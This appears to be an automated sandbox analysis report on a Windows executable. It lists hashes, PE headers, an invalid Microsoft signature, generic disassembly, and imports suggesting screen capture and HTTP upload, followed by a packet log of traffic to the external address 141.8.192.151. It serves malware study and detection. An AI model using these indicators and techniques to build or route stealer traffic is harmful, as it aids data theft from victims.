                                  SSDEEP:12288:VoJqNIPtNmO6IOOEp0TMlja7NRl2PSVikIyoyueh+AkHcnLwuukoCOD6zlijOz+2:VoJEKZ6IEGTMxapRl2PSwHTehy6B1+p4
                                  TLSH:93E4C033F0C2C07ED0321032596CEB6259BFF9320A25499BA3C4156E9FB57D29E3665B
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..P$...$...$.......4...............0.......8.......%.......u.......3.......)...$...........&.......%...Rich$..................
                                  Icon Hash:aaf3e3e3918382a0
                                  Entrypoint:0x45e27e
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5FCCE7D9 [Sun Dec 6 14:16:57 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:2a908babc5cc3af850e078751d7de0e9
                                  Signature Valid:false
                                  Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                  Signature Validation Error:The digital signature of the object did not verify
                                  Error Number:-2146869232
                                  Not Before, Not After
                                  • 3/4/2020 10:39:47 AM 3/3/2021 10:39:47 AM
                                  Subject Chain
                                  • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                  Version:3
                                  Thumbprint MD5:AAEE394B1087AC1044A13D09468CDF1E
                                  Thumbprint SHA-1:2485A7AFA98E178CB8F30C9838346B514AEA4769
                                  Thumbprint SHA-256:C0772D3C9E20C3F4EBB09F5816D6DADA0D8FA86563C2D68898539EC1CD355A1B
                                  Serial:3300000187721772155940C709000000000187
                                  Instruction
                                  call 00007F49E88373A3h
                                  jmp 00007F49E8836BF9h
                                  cmp ecx, dword ptr [004A2014h]
                                  jne 00007F49E8836D85h
                                  ret
                                  jmp 00007F49E88374C7h
                                  mov ecx, dword ptr [ebp-0Ch]
                                  mov dword ptr fs:[00000000h], ecx
                                  pop ecx
                                  pop edi
                                  pop edi
                                  pop esi
                                  pop ebx
                                  mov esp, ebp
                                  pop ebp
                                  push ecx
                                  ret
                                  mov ecx, dword ptr [ebp-10h]
                                  xor ecx, ebp
                                  call 00007F49E8836D55h
                                  jmp 00007F49E8836D60h
                                  push eax
                                  push dword ptr fs:[00000000h]
                                  lea eax, dword ptr [esp+0Ch]
                                  sub esp, dword ptr [esp+0Ch]
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [eax], ebp
                                  mov ebp, eax
                                  mov eax, dword ptr [004A2014h]
                                  xor eax, ebp
                                  push eax
                                  push dword ptr [ebp-04h]
                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                  lea eax, dword ptr [ebp-0Ch]
                                  mov dword ptr fs:[00000000h], eax
                                  ret
                                  push eax
                                  push dword ptr fs:[00000000h]
                                  lea eax, dword ptr [esp+0Ch]
                                  sub esp, dword ptr [esp+0Ch]
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [eax], ebp
                                  mov ebp, eax
                                  mov eax, dword ptr [004A2014h]
                                  xor eax, ebp
                                  push eax
                                  mov dword ptr [ebp-10h], eax
                                  push dword ptr [ebp-04h]
                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                  lea eax, dword ptr [ebp-0Ch]
                                  mov dword ptr fs:[00000000h], eax
                                  ret
                                  push eax
                                  push dword ptr fs:[00000000h]
                                  lea eax, dword ptr [esp+0Ch]
                                  sub esp, dword ptr [esp+0Ch]
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [eax], ebp
                                  mov ebp, eax
                                  mov eax, dword ptr [004A2014h]
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa06dc0x8c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xa84000x23a8.reloc
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa70000x680c.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x992f80x38.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x994000x18.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x993300x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x870000x28c.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x854ec0x85600False0.5623700357310215data6.724381241477367IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x870000x1a5960x1a600False0.4773863299763033data5.592124453306788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xa20000x42d40x1a00False0.1736778846153846DOS executable (block device driver \200\377\377\377\377\261,32-bit sector-support)3.945907427530122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .reloc0xa70000x680c0x6a00False0.6731647995283019data6.626873203758056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  DLLImport
                                  KERNEL32.dllEnterCriticalSection, GetCurrentProcess, WriteFile, LeaveCriticalSection, SetFilePointer, InitializeCriticalSectionEx, UnmapViewOfFile, GetModuleHandleA, HeapSize, MultiByteToWideChar, GetFileInformationByHandle, CopyFileA, GetLastError, CreateFileA, FileTimeToSystemTime, LoadLibraryA, LockResource, HeapReAlloc, CloseHandle, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, GetLocalTime, DecodePointer, HeapDestroy, GetProcAddress, CreateFileMappingA, GetFileSize, DeleteCriticalSection, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, HeapFree, MapViewOfFile, GetTickCount, IsWow64Process, AreFileApisANSI, GetFullPathNameW, LockFile, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, GetTempPathW, CreateFileW, GetFileAttributesW, GetCurrentThreadId, Sleep, GetTempPathA, GetFileAttributesA, GetVersionExA, DeleteFileA, DeleteFileW, LoadLibraryW, UnlockFile, LockFileEx, GetCurrentProcessId, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, QueryPerformanceCounter, FlushFileBuffers, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, SizeofResource, GetModuleFileNameA, WideCharToMultiByte, ReadFile, ReadConsoleW, GetTimeZoneInformation, GetFileType, GetFileSizeEx, GetConsoleMode, GetConsoleCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, WriteConsoleW, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, QueryPerformanceFrequency, GetModuleHandleExW, ExitProcess, VirtualQuery, VirtualProtect, VirtualAlloc, GetSystemInfo, GetCurrentDirectoryW, CreateDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, RemoveDirectoryW, SetFilePointerEx, SetLastError, GetModuleHandleW, CopyFileW, LocalFree, GetStringTypeW, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, InitializeSListHead, TerminateProcess, RtlUnwind, LoadLibraryExW
                                  USER32.dllGetDC, GetSystemMetrics, ReleaseDC, GetDesktopWindow
                                  GDI32.dllDeleteObject, GetObjectA
                                  SHLWAPI.dllPathFindExtensionW, PathFindExtensionA
                                  gdiplus.dllGdipSaveImageToFile, GdipCreateBitmapFromScan0, GdipGetImageEncodersSize, GdipDisposeImage, GdipGetImageEncoders, GdiplusShutdown, GdipCreateBitmapFromHBITMAP, GdiplusStartup
                                  WININET.dllInternetWriteFile, HttpEndRequestA, HttpSendRequestExA, InternetOpenA, HttpOpenRequestA, InternetConnectA, InternetCloseHandle
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 4, 2023 11:17:55.902425051 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.072740078 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.072932959 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.079627991 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.079782009 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.094963074 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.249490976 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.249521017 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.249603033 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.264888048 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.265000105 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.419353008 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.424361944 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.434746981 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.434777975 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.434906960 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.594331980 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.594361067 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.594460011 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.604712009 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.604742050 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.604887009 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.764575005 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.764589071 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.764790058 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.774861097 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.774913073 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.774954081 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.774988890 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.775048971 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.775150061 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.775150061 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.934864998 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.934967041 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.935003042 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.935038090 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.935070038 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.935084105 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.935084105 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.935203075 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.935204029 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.945063114 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.945122004 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.945209980 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.945349932 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.945385933 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.945411921 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.945460081 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.945496082 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.945539951 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.945539951 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.945605993 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.945605993 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.945605993 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:56.945637941 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:56.945755005 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.105052948 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105093002 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105114937 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105134964 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105282068 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105304003 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105305910 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.105305910 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.105325937 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105400085 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.105400085 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.105418921 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.105496883 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105588913 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.105592966 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105614901 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.105659962 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.105683088 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.115295887 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.115331888 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.115484953 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.115525007 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.115600109 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.115648031 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.115668058 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.115714073 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.115736961 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.115833998 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.115950108 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116012096 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116090059 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116194010 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116214037 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116286039 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116286039 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116384029 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116405010 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116465092 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116465092 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116488934 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116511106 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116534948 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116554976 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116579056 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116602898 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116631031 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.116662979 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.116739988 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.156888008 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.157087088 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275298119 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275336027 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275500059 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275553942 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275676012 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275723934 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275748014 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275768042 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275784016 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275789022 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275809050 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275810957 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275809050 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275832891 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275852919 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275855064 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.275852919 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275882006 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275882006 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275919914 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.275948048 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.276014090 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.276133060 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.276161909 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.276186943 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.276222944 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285305977 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285346985 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285370111 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285392046 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285428047 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285459995 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285459995 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285535097 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285535097 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285638094 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285662889 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285717010 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285732985 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285762072 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285782099 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.285828114 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285828114 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.285990000 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286009073 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286036968 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286060095 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286112070 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286173105 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286247015 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286298990 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286305904 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286349058 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286444902 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286513090 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286535025 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286590099 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286602020 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286631107 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286680937 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286736965 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286740065 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286761045 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286782026 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286782980 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286803007 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286803007 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.286824942 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.286860943 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.287256956 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.287281990 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.287302971 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.287306070 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.287323952 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.287341118 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.287373066 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.287391901 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.327167988 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.327452898 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.445487022 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.445596933 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.445683956 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.445713997 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.445765018 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.445812941 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.445935011 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.446044922 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.446116924 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.446223974 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.446300983 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.446387053 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.446393013 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.446464062 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.446506977 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.446599960 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.446621895 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.446695089 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.446753979 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.446860075 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.447001934 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.447061062 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.447077990 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.447083950 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.447101116 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.447141886 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.447160006 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.447238922 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.447326899 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.447436094 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.447527885 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.455333948 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.455370903 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.455435038 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.455457926 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.455508947 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.455581903 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.455581903 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.455667019 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.455748081 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.455822945 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.455846071 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.455899000 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.455925941 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.455938101 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.455997944 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.456002951 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.456072092 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:17:57.456161976 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.456228971 CEST4918580192.168.2.22141.8.192.151
